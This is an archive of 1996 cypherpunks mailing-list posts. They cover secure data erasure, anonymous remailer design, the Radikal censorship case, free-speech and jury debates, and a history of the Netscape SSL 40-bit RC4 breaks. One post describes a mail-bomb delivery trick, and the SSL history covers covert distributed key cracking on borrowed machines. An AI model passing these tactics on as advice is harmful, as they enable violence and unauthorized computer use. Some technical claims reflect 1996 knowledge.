Symposium Proceedings in private mail.  Since I think the question is of
general interest I am posting the answer and Bccing the original
questioner.

The paper starts with the comment that most secure data destruction guides
are classified.  There is the suspicion that the unclassified ones do not
cover the newer recording materials and techniques, and will not protect
you against government attackers.

The analysis techniques for disks examined were Magnetic Force Microscopy
(MFM) and its close cousin, Magnetic Force Scanning Tunneling Microscopy
(STM).  "It is possible to build a reasonably capable SPM for about
US$1400, using a PC as a controller." (See
http://www.skypoint.com/~members/jrice/STMWebPage.html)  This cost is
conceivably within the range of a high school student.

Peter discusses the way that data can be recovered from under new data (due
to the difference in the magnetic domains depending on whether the bits
were the same or different), and beside new data due to positioning errors
of the head.

When trying to develop a secure erasure technique, you need to know the
encoding technique used on the disk.  (e.g. FM, MFM, RLL, PRML etc.)

He recommends a 35 pass erasure scheme as follows:

1-4     Random
5       0x55
6       0xAA
7       0x924924
8       0x492492
9       0x249249
10      0x00
11      0x11
12      0x22
13      0x33
14      0x44
15      0x55
16      0x66
17      0x77
18      0x88
19      0x99
20      0xAA
21      0xBB
22      0xCC
23      0xDD
24      0xEE
25      0xFF
26      0x924924
27      0x492492
28      0x249249
29      0x6DB6DB
30      0xB6DB6D
31      0xDB6DB6
32-35   Random

He recommends using cryptographically random numbers and randomly permuting
the deterministic passes to further confuse attackers.

He warns about disabling any disk caches which may be present, and
discusses the problems of erasing data on now-bad sectors.  He points out
that data which has been left for a long time is harder to erase than
recently written data.  He mentions that the most powerful commercially
available deguassers aren't powerful enough to erase modern disks or DAT
tapes.  (N.B. Deguassing a disk will also erase the factory-written control
tracks, making the disk useless.)  He notes that ECC may make destruction
of data more difficult.

He recommends burning floppy disks.

He also discusses recovering data from DRAM and SRAM devices.  He mentions
that data which has been stored in DRAM for 10 minutes will be detectable
after power is removed.  He recommends that sensitive data (such as crypto
keys) have their bits flipped every second or so.  This technique has the
beneficial side effect that the page remains recently used and is less
likely to be paged out.\

I quote from his conclusion, "Data overwritten once or twice may be
recovered by subtracting what is expected to be read from a storage
location from what is actually read.  Data which is overwritten an
arbitrarily large number of times can still be recovered provided that the
new data isn't written to the same location as the original data (for
magnetic media), or that the recovery attempt is carried out fairly soon
after the new data was written (for RAM).  For this reason it is
effectively impossible to sanitize storage locations by simple overwriting
them, no matter how many overwrite passes are made or what data patterns
are written.  However by using the relatively simple methods presented in
this paper the task of an attacker can be made significantly more
difficult, if no prohibitively expensive."


-------------------------------------------------------------------------
Bill Frantz       | "Lone Star" - My personal  | Periwinkle -- Consulting
(408)356-8506     |  choice for best movie of  | 16345 Englewood Ave.
frantz@netcom.com |  1996                      | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienk@ix.netcom.com
Date: Thu, 12 Sep 1996 16:20:01 +0800
To: cypherpunks@toad.com
Subject: Re: 16oz packages
In-Reply-To: <Pine.BSI.3.91.960907060416.22456B-100000@escape.com>
Message-ID: <199609120618.XAA19460@dfw-ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


The Unabomber used his intended victim's address for the return address on 
several if his mail bombs, and then used insufficient postage on them to ensure 
that they would be "returned to sender." It would seem that the same tactic 
could be used now, if packages over 16oz are "sent back."  How are we any safer 
now?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienk@ix.netcom.com
Date: Thu, 12 Sep 1996 16:18:39 +0800
To: cypherpunks@toad.com
Subject: Re: strengthening remailer protocols
In-Reply-To: <9609101751.AA00594@ch1d157nwk>
Message-ID: <199609120618.XAA27372@dfw-ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 10 Sep 96, Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com> 
wrote:
>Wei Dai writes:
>>  How about a combination of the two?  Suppose Alice wants to
>>  anonymously post a message and get replies.  She generates a
>>  new RSA key, signs her post with it, and asks readers to send
>>  encrypted replies to a server.  Then periodicly she sends a
>>  one-time reply block to the server to retrieve the accumulated
>>  replies.
>
>I'd like to chime in and say that this is a really good idea.  Basically a  
>nymserver that holds onto incoming mail until an e-mail arrives from the nym  
>to retrieve it.

Instead of that, how about this?

1. Create a pool of N remailers, each with its own set of public/private key 
pairs.  The public key(s) for each remailer are widely disseminated. Each 
remailer also publishes a list of other remailers that it will poll for 
messages. (More about this later.)

2. Each remailer user MUST have at least 1 public/private key pair per nym.  The 
public key should be widely available.

3. Each message is encrypted with the intended recipient's (nym's) public key, 
and then with each remailer's public key succesively, but in reverse order. (The 
message is encrypted last with the public key of the first remailer in the 
chain.)  The chain is determined by selecting some subset of N at random, with 
the set growing as the need for security increases. Encryption is done a la PGP, 
with a header prepended to the message containing the fingerprint of the public 
key used to encrypt the session key used to encrypt the actual message. Each 
layer of encryption encrypts the header of the previous layer of encryption as 
well as the message, so only the last encryption is "visible", and it is not 
feasible to detect the number of encryptions by examining the message.

4. The multiply-encrypted message is sent to the first remailer in the chain.  
The remailer decrypts the message with its private key, and at this point one of 
two things can happen. If the decrypted message specifies an email address, the 
remailer sends the message to the specified address. Otherwise, it posts it in a 
publicly available database with 3 fields. 2 are public; one contains the key 
fingerprint of the outermost public encryption key, and the other contains the 
message itself.  The third, private field contains the date/time the record was 
added to the database. Any appropriate techniques for reducing input/output 
correlation can be used, such as delaying the decryption for random time 
intervals, dummy messages between remailers, etc. Remailer-to remailer traffic 
(or to any nym that gets a lot of traffic) should should be bundled together 
(take a few hours worth of traffic going to a specific nym, ZIP it into one 
large message, and re-encrypt using that nym's public key) to prevent a sender 
from being able to recognize any of his messages in transit.

5. Anyone can do lookups in the public fields of the message database by key 
fingerprint. Remailer users do this to download their messages, and remailers 
download messages from other remailers in this manner as well. Anyone can 
download any message in the database; only the intended recipient will be able 
to decrypt it. Messages are not deleted when they are downloaded; instead they 
are kept for a fixed period of time (determined by the remailer operator) and 
then deleted. If users are required to download other people's messages, tracing 
a message to one specific person will be much more difficult.

6. Steps 4 and 5 are repeated until the final recipient receives his message and 
decrypts it, at which time crypto-anarchic utopia can resume.

Randumb Thotz:
Given an encryption program with a database of which remailers poll other 
remailers, remailer chaining can be automated, and be done randomly.

If 2 nyms can agree to poll a mutually known set of remailers, (such as via 
anonymous Usenet/Blacknet postings) 2-way anonymous correspondence can occur 
without either nym having to know the other nym's email address. The remailer 
operators wouldn't know either, but they may be able to make reasonably informed 
guesses at recipient-nym relationships via analysis of database browsing 
patterns.  This is the the weakest part of the proposal, and suggestions for 
preventing this would be appreciated.

Remailers should use SSL or other encrypted communication protocols to ensure 
that third parties cannot observe who is browsing what in the public message 
databases.

Jonathan Wienke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tank <tank@xs4all.nl>
Date: Thu, 12 Sep 1996 09:56:05 +0800
To: tank@xs4all.nl (tank)
Subject: Pressrelease SPG: About the digital Radikal
Message-ID: <199609112206.AAA17575@xs2.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain



Pressrelease Solidariteitsgroep Politieke Gevangenen (SPG)-
(Solidaritygroup Political Prisoners) Amsterdam, September 9th , 1996.

German Prosecution starts investigation into the digital Radikal.

On monday the 2nd of september the BRD State Prosecution started an
official investigation against 'unknown distributors' of the
Radikal-magazine on the Internet. These 'unknown distributors' are
suspected of violating the German law:

Par. 129a Abs. 3 StGB : Recruiting for an illegal terrorist organisation,
Par. 140 Nr. 2 StGB      : Approval of criminal offences, 
Par. 130a Abs. 1 StGB  : Calling for criminal acts.

The digital version of the Radikal is accessible through computers in
the Netherlands and the United States.

Besides this legal investigation, the German BAW (prosecution office)
has ordered German Internet Providers to block the access to the
digital version of the Radikal. A number of providers and associations
of providers has given in to this call.  This means that all websites
of XS4ALL-clients in the Netherlands and of DataRealm-clients in the
USA. have been made inaccessible for German Internet users. In
reaction to this German attempt to censor the Internet mirrorsites
(identical copies) of the Radikal have been put on various computers
throughout the world. 

Since December 1995 we, the Solidaritygroup Political Prisoners, have
added the full edition of the in Germany illegal magazine Radikal to
our homepage on the World Wide Web. On this moment major parts of
number 153 and the full edition of number 154 are accessible through
the World Wide Web. We decided to do this after a renewed attempt (one
of many over the years) of the German authorities to silence the
Radikal.

The Radikal is a magazine made by and for the radical left movement in
the BRD. The magazine was set up in the mid '70-ies as a means of
communication between various left-wing organisations. After a series
of homesearches, arrests and long-time prison sentences, it was clear
for the makers that they couldn't continue the magazine on the same
basis. It was decided then to make the future editions of the magazine
outside the view of the German authorities.

Because the German Prosecution couldn't localise the makers of
Radikal, a short period of quietness followed in which no policeraids
etc. took place. Than trouble started anew. This time it were not the
makers of the magazine who were targeted, but the persons who sold the
magazine, bookshops and infocafe's. Through the years there have been
hundreds of policeraids, numerous arrests and many people have spent
months and years in jail for 'supporting a terrorist organisation'
(i.e. distribution of the Radikal).  As a result of these experiences
the distribution of the Radikal is no longer organised through
bookshops etc., but through a underground network.

Mid June 1995 the German Prosecution stroke again. All over Germany
special units of the police stormed, often with drawn guns, a great
number of houses and left-wing centres. Four people were arrested and
charged with membership of a terrorist organisation (i.e. making and
distributing the Radikal). Four others, who were not at home at the
time of the police raid, went underground. An enormous amount of
things were confiscated by the police. It was striking that the police
especially looked for digital information. More than thousand
floppydisc's  and various computers were taken for further research. 
The people arrested were held in detention under remand for six months
and were only released after payment of 20.000 DM bail p.p. and a
whole set of conditions they had to comply with. 

Exactly one year after the raids on June 13 1996, three of the four
persons in hiding (Uli, Jutta and Frank) turned themselves in.
Supported by 250 sympathisers they reported themselves at a German
court after a pressconference. (Matthes, the fourth person in hiding,
stayed away, because he is also being charged with membership of the
AIZ, the Anti Imperialist Cell's.) At the court the three persons were
taken into detention under remand after which their lawyer filed a
petition for immediate release on grounds of the fact that there was
no reason that the suspects would again run away and that after one
year there's no longer any risk that the suspects would destroy any
evidence.

The petition was only partially successful. On June 15 Uli and Jutta
were released, again with a lot of conditions. They had to hand in
their passports, had to report themselves three times a week at the
police, were not allowed any contact with anybody against whom an
investigation was going on with regard to the Radikal and they had to
pay a bail of 20.000 DM each.

Frank is until now held in isolation under aggravated circumstances.
The Prosecution claims to have proof that he collaborated on the
release of Radikal editions 153 & 154 during his period in hiding. Up
till now his lawyers were not allowed look into his dossier.

 New actions against the Radical took place on June 17 this year when
 in a number of German cities again houses were searched by the
 police. This time persons suspected of having a subscription to the
 Radikal were targeted. By way of their payments they were accused of
 supporting a terrorist organisation. Besides this they were suspected
 of letting others read the Radikal  (recruiting for a terrorist
 organisation). For us this was another reason to put the latest issue
 (154) of the Radikal again on the Internet.

Despite the fact that we, the Solidaritygroup Political Prisoners
(SPG) Amsterdam, declared before that we put the Radikal on Internet,
the German Prosecution started an investigation against 'unknown
persons'.  This is a frequently used strategy. With an investigation
on name, the Prosecution can only get permission to tap the phones
etc. of a limited amount of people, while an investigation against
'persons unknown' gives them much more possibilities. With this in
mind it wouldn't surprise us if one of these days in Germany the
police will again kick in a lot of doors in relation with the
investigation against us.

The German Prosecution seems to be pretty confident at the moment and
states that from the confiscated goods, they managed to compile a lot
of information about the Radikal, her makers (m/f) and her structures.
But we wonder if they are going to be equally confident about their
actions against the digital Radikal. Censorship on the Internet
creates best-sellers. With respect to the Internet this is a very
important case. For the first time a European government tries to
censor political news on the Internet. (Until now such action was only
directed against porn on the Internet.) If the German Prosecution
succeeds in their attempts to censor the Internet, the Radikal will be
the first but definitely not the last. Fortunately there are many
people active around the theme of censorship on the Internet and
though they don't all support us ideologically, many declare
themselves to sympathise with the struggle for the continuation of the
Radikal on the Internet and accordingly place copies of the magazine
on their Websites. On this moment the Radikal is already accessible
through more than twenty addresses over the whole world. If the German
Prosecution wants to sustain their attempts to block the digital
Radikal they will have to block all these providers and will finally
block Germany from the rest of the Internet.

Read the Radikal now at:

  1. http://burn.ucsd.edu/%7Eats/RADIKAL/     
  2. http://www.jca.or.jp/~taratta/mirror/radikal/
  3. http://www.serve.com/~spg/
  4. http://huizen.dds.nl/~radikal
  5. http://www.canucksoup.net/radikal/index.html
  6. http://www.ecn.org/radikal
  7. http://www.well.com/~declan/mirrors/
  8. http://www.connix.com/~harry/radikal/index.htm
  9. http://www.ganesa.com/radikal/
 10. http://www.denhaag.org/~radikal
 11. http://www.knooppunt.be/~daniel/radikal
 12. http://emma.unm.edu/radikal
 13. http://www.tacacs.com/radikal/"
 14. http://www.dsvenlo.nl/vvd/radikal/
 15. http://www.why.net/home/static/radi
 16. http://users.abcs.com/dockmstr/mirror/radikal/index.htm
 17. http://www.xs4all.nl/~jeroenw/radikal/
 18. http://home.ipr.nl/~radikal/
 19. http://www.dreamy.demon.co.uk/occam/
 20. http://www.ibmpcug.co.uk/~irdial/live_free/
 21.http://zero.tolerance.org/radi/index.htm 
 22.http://www.meaning.com/library/radikal/ 
 23.http://www.xs4all.nl/~irmed/radikal/ 
 24.http://www.walli.uwasa.fi/~tviemero/radikal 
 25.http://www.sko.it/~sfede/radi/index.htm 
 26.http://www.bart.nl/~sz/index.html 
 27.http://bellp.med.yale.edu/index.htm 
 28.http://www.euronet.nl/users/funest/radi/index.htm 


And naturally as usual at: http://www.xs4all.nl/~tank/radikal/

>From here we want to wish Frank in prison and Matthes where ever he is
lots of strength. The struggle continues !!

Please write to Frank (he will probably be replaced to Koln soon). His
temporary address is : Frank Grossinsky
 p/a Ermittlungsrichter Wolst am BGH
 Herrenstr.45a
 76125 Karlsruhe
 Germany.
(All post will be read and censored by the police!)


11-9-1996

Solidariteitsgroep Politieke Gevangenen, (SPG Amsterdam).
tank@xs4all.nl			http://www.xs4all.nl/~tank





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amnesia@chardos.connix.com (Anonymous)
Date: Thu, 12 Sep 1996 18:32:25 +0800
To: cypherpunks@toad.com
Subject: Re: Child porn as thoughtcrime
Message-ID: <199609120442.AAA27448@chardos.connix.com>
MIME-Version: 1.0
Content-Type: text/plain


Chuck Thompson writes:
>
> Well Andrew, pornography is meant to lead to arousal, which can lead to
> aggression, which may lead to abuse.  It's a fairly common path according to
> what I've read on deviancy.

Going into a bank can lead to casing out the joint, which may lead to
a heist.  Should this make the posession of pictures of banks illegal?

I don't think that anyone here is advocating kiddie porn.  The problem
that TCM pointed out is that in fighting kiddie porn, legislators
have started banning _thoughts_ that _could_ lead to child abuse.
This is one great leap forward into the police state.

>  Following is one association's opinion, but
> don't stop there, read for yourself what some of the deviants themselves
> have to say:

You're seeing the trees and missing the forest.  It could be
any activity, say the abuse of animals, that winds up being
used as a wedge to create the police state.

If the government started tatooing red 'P's on the foreheads of
convicted pedophiles, would anyone notice the irony?


Bobo





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Thu, 12 Sep 1996 18:25:35 +0800
To: cypherpunks@toad.com
Subject: jury nullification/selection
Message-ID: <2.2.32.19960912075929.00691470@pop.ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain



Sorry if I was too terse earlier. I hadn't intended to start a big FIJA dustup.

I think that government sleaziness is not only useful in a true
nullification argument ("he's guilty but you should acquit anyway") but
where it reflects on the credibility of testimony and the prosecution's case
in general. It's easy to imagine a prosecution which rests on the testimony
of people who lie every day (criminally involved informants, jailhouse
informants, and undercover cops) and/or real evidence which was gained
through the use of subterfuge and trickery (like wiretap/body wire
evidence). The idea is to make the government look sleazier and trickier
than the defendant(s) and the defense witnesses. If the government's
evidence ends up being tainted directly or indirectly by lying, trickery,
etc., then the defense can argue "Hey. You can't trust anyone who got up on
that stand and talked to you. And if you don't know who to trust and you
think everyone's lying, the government's got no case. And if they've got no
case, the judge will tell you that you must acquit." 

So I think that public distaste and discomfort with weirder and sleazier
tactics on the part of cops can be (and is) discussed and used and "voted
on". "Not guilty" doesn't necessarily mean "innocent", sometimes it means
"The prosecution didn't have enough evidence I thought I could trust." 

And yes, I agree that even mentioning nullification during voir dire will
probably get you kicked off of a jury; and I think that's partly because one
party or the other will be scared of nullification, and partly because the
term "jury nullification" makes people think of FIJA and associated loons.
Nobody wants a loon on the jury. (I don't think everyone who argues for
nullification is a loon, but some of them sure are - and there's no good way
to figure out whether someone's a loon or not in the middle of jury selection.) 

And I also agree that the jury selection process tends to select away from a
true cross-section of society; but the few easily available examples (big
trials like OJ or the Menendez Bros. or Wm. Kennedy Smith or whoever) are
poor examples because they're not typical. Trials where lots is at stake
(death penalty or celebrity defendant or big $ civil trials) tend to have
longer processes (which weed out everyone who isn't incredibly boring) but
it's not at all uncommon to pick a jury in a morning or in a day or two. In
federal court, the judge usually questions the jury instead of the attorneys
(which is faster), and may or may not ask questions that the attorneys have
suggested. Also, sometimes one side or the other will *want* especially
analytical or technical or well-trained jurors. Attorneys want to pick a
jury they can persuade, but they also want to pick a jury that can
understand their theory of the case. 

So I guess my point is that while the jury system isn't perfect, it is in
some ways a much more direct way to "vote" on how things work in the
judicial and law enforcement systems. I think it's more immediately and
directly democratic than the electoral system. All of the legal bullshit
aside, it's possible to think about trials as a way for people who have some
sort of problem (they've been injured or accused of a crime or whatever) to
tell a group of uninvolved people about the problem and ask them what the
right thing to do is. Yeah, that's really oversimplified, but I think that
what juries do is important and that what they do has a political and a
moral dimension even if attorneys aren't supposed to talk about it during
argument. 

--
Greg Broiles                |  "We pretend to be their friends,
gbroiles@netbox.com         |   but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz
Date: Thu, 12 Sep 1996 05:40:35 +0800
To: cypherpunks@toad.com
Subject: [Long] A history of Netscape/MSIE problems
Message-ID: <84245818912499@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


I've been putting together a writeup on problems in web browsers, mainly the 
history of the Netscape RC4/40 break, random number bugs, and problems with 
Java, as part of a longer paper I'm doing on crypto from a non-US perspective. 
A lot of the information in this section of the paper has come from this list, 
so I thought I'd post it for comment and in case anyone found it interesting 
(please don't post it to web sites or anything until the paper is actually 
published).  If anyone has anything to add, corrections to make, etc, please 
let me know.
 
Peter.
 
The Netscape SSL Break and its Implications
-------------------------------------------

The Secure Socket Layer (SSL) protocol, after a somewhat shaky start (version 1
was broken within 10 minutes of being unveiled [Hallam-Baker 1996]), and an
attempt by Microsoft to promote a similar but competing protocol [Benaloh
1995], has more or less edged out any other protocols to become the standard
for securing HTTP sessions (an overview of SSL and various other proposed WWW
security mechanisms is given in [Reif 1995a]).  SSL uses a combination of RSA
and, usually, a proprietary (until it was reverse-engineered, of which more
later) algorithm called RC4 to provide confidentiality, data integrity, and
authentication.  Since it was built into what was by far the most popular web
browser, and because of Netscape's policy of giving away the software, it
immediately gained widespread popularity.  No details on RC4 were published,
but the fact that it was designed by a very good cryptographer was enough to
reassure most people.  RC4 is used in dozens of commercial products including
Lotus Notes, a number of Microsoft products such as Windows for Workgroups,
Windows 95, Windows NT, and Access, Apple's AOCE, and Oracle Secure SQL.

The main criticism of SSL (apart from a few protocol flaws which were fixed in
later versions) was the fact that RC4 used a key of only 40 bits, making it
susceptible to a brute-force attack.  The reason for the 40-bit key and
(according to RSADSI, the company that developed RC4) the reason why details on
it were kept secret was that these conditions were required under an agreement
between the Software Publishers Association (SPA) and the US government which
gave special export status to the RC4 algorithm and a companion algorithm
called RC2.  Implementations of RC2 and RC4 which are restricted to a 40-bit
key get automatic export approval provided the implementations work correctly
with a set of test vectors supplied by the NSA.  Provided the results are as
expected, export approval is granted within a week.

The weakness of the encryption in US-exportable SSL implementations even led
the French government, which normally bans all non-government-approved use of
encryption (the "decret du 18 avril 1939" defines 8 categories of arms and
munitions from the most dangerous (1st category) to the least dangerous (8th
category), the "decret 73-364 du 12 mars 1973" specifies that encryption
belongs to the second category, and the "loi 90-1170 du 29 decembre 1990"
states that use of encryption equipment must be approved by the French
government), to approve the use of Netscape in France [Vincent-Carrefour 1996],
presumably because the French government has no problems in breaking it.

The first step in attacking SSL was to find out how RC4 worked.  Since it was
in widespread use, it was only a matter of time before someone picked the code
apart and published the algorithm.  RSADSI sell a cryptographic toolkit called
BSAFE [BSAFE 1994] which contains RC4, and this seems a likely source for the
code (the Windows password encryption code is also a good source, and the
algorithm can be extracted in an hour or two).  The results were posted to
mailing lists and the Internet [Anon 1994a].  Someone with a copy of BSAFE
tested it against the real thing and verified that the two algorithms produced
identical results [Rescorla 1994], and someone else checked with people who had
seen the original RC4 code to make sure that it had been (legally)
reverse-engineered rather than (illegally) copied [Anon 1994b].

The RC2 code was disclosed in a similar manner in 1996, but after problems with
legal threats during the RC4 disclosure process it was handled more formally:
First an RC2 implementation was reverse-engineered [Anon 1996], then a
specification for the algorithm was written based on the reverse-engineered
code [Gutmann 1996], and finally a new implementation based on the
specification was written by someone who had never seen the reverse-engineered
RC2 code [Vogelheim 1996].  No legal threats were ever issued over RC2.

The RC4 code was immediately subject to intense analysis in various
cryptography-related fora.  RC4 has two parts, the initialization phase, and
the random number generation phase used for the encryption itself.  An array is
initialized to be a random permutation using the user's key.  The random number
generator then mixes the permutation and reports values looked up
pseudorandomly in that permutation.

Among various RC4 problems which were discussed are that the likelihood that
during the initialization phase small values will remain in small positions in
the initial permutation is too high; user keys are repeated to fill 256 bytes,
so 'aaaa' and 'aaaaa' produce the same permutation; results are looked up at
pseudorandom positions in the array, and if some internal state causes a
certain sequence of positions to be looked up, there are 255 similar internal
states that will look up values in the same sequence of positions (although the
values in those positions will be different), from which it can be shown that
cycles come in groups of 2^n, where all cycles in a group have the same length,
and all cycles are of an odd length * 256 unless they are in a group of 256;
there is a bias in the results so that, for example, the pattern "a a" is too
likely and the pattern "a b a" is too unlikely, which can be detected only
after examining about 8 trillion bytes; the internal state is not independent
of the results, so that with a given result there are two patterns in the
internal state that appear 1/256 times more often than they ought to; at least
two seperate methods exist for deducing the internal state from the results in
around 2^900 steps; and under certain special circumstances the initial byte of
the pseudo-random stream generated by RC4 is strongly correlated with only a
few bytes of the key.

All of these "weaknesses" except for the last one are purely theoretical in
nature, and even the last one can only occur under special circumstances (it
doesn't affect SSL implementations since they hash the key with MD5 rather than
using it directly, which avoids the problem).  Overall, the cryptographic
community agreed that RC4, when used correctly, was a sound cipher.

Unfortunately, due to the US export restrictions, RC4 couldn't be used
correctly.  Although Netscape negotiated a 128-bit key to protect each session,
it sent 88 of those 128 bits in the clear so that only 40 bits of the key were
actually kept secret.  Now that RC4 was known, SSL became a prime target for
attack.  An initial attempt at breaking RC4 was made in July 1995 using
encrypted data from a Microsoft Access database [Back 1995a].  This attempt
involved 89 contributors and took about a week using idle computing time on
workstations and PC's, with around 80% of the work being done by the top 19
contributors.  Due to logistical problems, human error, and buggy software, the
attempt ultimately failed, but the stage had been set for an attack on SSL.  On
14 July 1995, an SSL challenge message containing an encrypted (fake) credit
card order transmitted to one of Netscapes own computers was posted to mailing
lists and the Internet by Hal Finney [Finney 1995a].  The challenge message was
independantly broken by two groups, the first to announce success in breaking
it was a French researcher using idle time on a collection of 120 computers and
workstations over 8 days [Doligez 1995a] [Doligez 1995b].  The 40-bit secret
part of the key was 7E F0 96 1F A6, and was found after scanning just over half
the key space.  The average search speed was about 850,000 keys/s, with a peak
of 1,350,000 keys/s.  A second group had broken it two hours earlier, but
announced their success a day later [Back 1995b].  The event immediately
attracted international media attention, including newspaper, radio, and
television coverage (although many reports were rather garbled) in France
[Munger 1995], Germany [Reif 1995b], Japan [NewsBytes 1995], the UK [Arthur
1995], and the US [Beck 1995] [Sandberg 1995].

A second challenge was posted on 19 August 1995 [Finney 1995b] and an attack by
a `Brute Squad' of 201 Internet-connected volunteers began at 1800 GMT on 24
August 1995.  The attack involved greatly improved software with automatic
communication between client workstations attacking the encryption and a
central server which doled out sections of keyspace to search [Brooks 1995].
This setup took 31.8 hours to find the key, 96 36 34 0D 46.  Congestion on the
server being used to coordinate the attack meant that most of the machines
involved were idle for perhaps 3/4 of their available time, so in theory the
attack could have been completed in only 8 hours.  Both the client and server
software was continually upgraded during the duration of the attack.

The attacks, which used only unused processing capacity on the machines, were
essentially "free", and could easily be mounted using the spare processing
capacity available in companies, businesses, universities, and foreign
governments.  By breaking a brute-force attack into a number of independant
sections, as many machines as are needed can be applied to the problem, so that
each doubling of the amount of hardware applied to the problem halves the time
required to find the solution.  Although the total investment will have
doubled, the cost per recovered key is kept constant since twice as many keys
can now be found in the same time.

Another possibility which has been suggested is the creation of an RC4-breaking
screen saver for networked Windows machines which performs key searches during
the (often prolonged) periods in which machines are left idle. One experiment
in performing this kind of attack took 2 weeks using relatively slow 486/50's
and Sparc 20's, with noone the wiser that the machines were being used
overnight for this purpose [Young 1996].  Another attack involved a networked
Windows screen saver where the client software was activated whenever a machine
was otherwise idle and communicated its results to a central server on a
network with around 100 PC's.  By now, breaking the Netscape encryption had
become a kind of processor benchmark, with one manufacturer rating the speed of
their system based on how long it took to break RC4 - 8 hours on one computer
[ICE 1996].

Further improvements to the attack were proposed.  The most important one was
to move from attacking one message at a time to attacking entire collections of
messages.  Instead of generating a key and testing it against a single message,
it could be tested against 100 messages, so that in average one key could be
found in 1/100th the time it took for a single message.  Unfortunately in the
case of SSL this wasn't possible, since although only 40 bits of key are kept
secret, there are still a total of 128 unique key bits for each message, making
it impossible to attack more than one message at a time.  In effect the
remaining 88 bits of key act as a `salt' in the same way the Unix password salt
works.  However a more simplistic implementation which uses only 40 bits of key
could be attacked in this manner.

The attacks on RC4 are a prime example of a publicity attack.  They were
carried out by volunteers using borrowed machine time, noone (apart from
Netscapes stock prices) was harmed, and they achieved a great deal of
publicity.  The intended goal - of proving that the restricted encryption
allowed by the US government could be broken - was achieved.  This fuelled
intense debate within the US about the need to lift the export restrictions in
order to facilitate electronic commerce.  Virtually every article covering the
encryption debate would eventually refer to the ease with which the 40-bit keys
of the form used in SSL could be broken (see for example [Ante 1996]).  The
fact that it was completely uneconomical to mount a criminal attack on 40-bit
SSL keys was mostly ignored (except in Netscape press releases).  The
enthusiasm for Internet commerce, especially commerce protected by SSL, was
severely dented, and companies began to adopt a more cautious attitude in
deploying commercial services over the net.


[Anon 1994a] `David Sterndark' (an alias), "RC4 Algorithm revealed", posting to
sci.crypt newsgroup, message-ID <sternCvKL4B.Hyy@netcom.com>, 14 September
1994.

[Anon 1994b] Anonymous, "`Alleged RC4' not real RSADSI code", posting to
sci.crypt newsgroup, message-ID <9409250900.AA17035@ds1.wu-wien.ac.at>, 25
September 1994.

[Anon 1996] Anonymous, "RC2 source code", posting to sci.crypt newsgroup,
message-ID <4ehmfs$6nq@utopia.hacktic.nl>, 29 January 1996.

[Ante 1996] Spence Ante, "Everything You Ever Wanted To Know About Cryptography
Legislation. . .(But Were Too Sensible to Ask)", PC World, May 1996.

[Arthur 1995] Charles Arthur, "Internet's 30bn Pound Secret Revealed", UK
Indpendent, 17 August 1995.

[Back 1995a] Adam Back, "Announce: Brute force of RC4, 40 bits all swept",
posting to sci.crypt newsgroup, message-ID <DC08Dz.LwG@exeter.ac.uk>, 20 July
1995.

[Back 1995b] Adam Back, "Another SSL breakage...",. posting to cypherpunks
mailing list, 17 August 1995.

[Beck 1995] Alan Beck, "Netscape's Export SSL Broken by 120 Workstations and
One Student", HPCwire, 22 August 1995.

[Benaloh 1995] Josh Benaloh, Butler Lampson, Daniel Simon, Terence Spies, and
Bennet Yee, "The Private Communication Technology Protocol (PCT)", Microsoft
Corporation, October 1995.

[Brooks 1995] Piete Brooks, "Cypherpunks `brute' key cracking ring",
http://www.brute.cl.cam.ac.uk/brute/.

[BSAFE 1994] BSAFE 2.1 software, RSA Data Security Inc, 1994.

[Doligez 1995a] Damien Doligez, "SSL challenge -- broken!", posting to
sci.crypt newsgroup, message-ID <40sajr$sps@news-rocq.inria.fr>, 16 August
1995.

[Doligez 1995b] Damien Doligez, "SSL challenge virtual press conference",
http://pauillac.inria.fr/~doligez/ssl/press-conf.html.

[Finney 1995a] Hal Finney, "SSL RC4 Challenge", posting to sci.crypt newsgroup,
message-ID <3u6kmg$pm4@jobe.shell.portal.com>, 14 July 1995.

[Finney 1995b] Hal Finney, "SSL Challenge #2", posting to cypherpunks mailing
list, message-ID <199508191525.IAA16294@jobe.shell.portal.com>, 19 August 1995.

[Gutmann 1996] Peter Gutmann, "Specification for Ron Rivests Cipher No.2",
posting to sci.crypt newsgroup, message-ID <4fk39f$f70@net.auckland.ac.nz>, 11
February 1996.

[Hallam-Baker 1996] Phill Hallam-Baker, "A problem with Navigator's cache
-Reply", posting to www-security mailing list, 25 August 1996.

[ICE 1996] Integrated Computing Engines, "MIT Student Uses ICE Graphics
Computer To Break Netscape Security in Less Than 8 Days", 10 January 1996.

[Munger 1995] Benoit Munger, "Cachez ces mots que je ne saurais lire", Le
Devoir, 28 August 1995.

[NewsBytes 1995] "Netscape Encrypted Data Cracked", NewsBytes, Tokyo, Japan, 18
August 1995.

[Sandberg 1995] Jared Sandberg, "French Hacker Cracks Netscape Code, Shrugging
Off U.S. Encryption Scheme", The Wall Street Journal, 17 August 1995, p.B3.

[Reif 1995a] Holger Reif, "Netz ohne Angst: Sicherheitsrisiken des Internet",
c't Magazine, September 1995, p.174.

[Reif 1995b] Holger Reif, "Peinliche Panne: Netscape gibt ernsthafte
Sicherheitslu"cken zu", c't Magazine, November 1995, p.26.

[Rescorla 1994] Eric Rescorla, "RC4 compatibility testing", posting to
cypherpunks mailing list, message-Id <9409140137.AA17743@eitech.eit.com>, 13
September 1994.

[Trei 1995] Peter Trei, "Netscape's SSL security has been compromised", posting
to comp.security.misc newsgroup, message-ID <40t4ti$b8s@iii1.iii.net>, 16
August 1995.

[Vincent-Carrefour 1996] Jacques Vincent-Carrefour, "Autorisation de fourniture
et d'utilisation generale de moyens de cryptologie No.2500", 509/DISSI dossier
numero 950038, 7 November 1995.

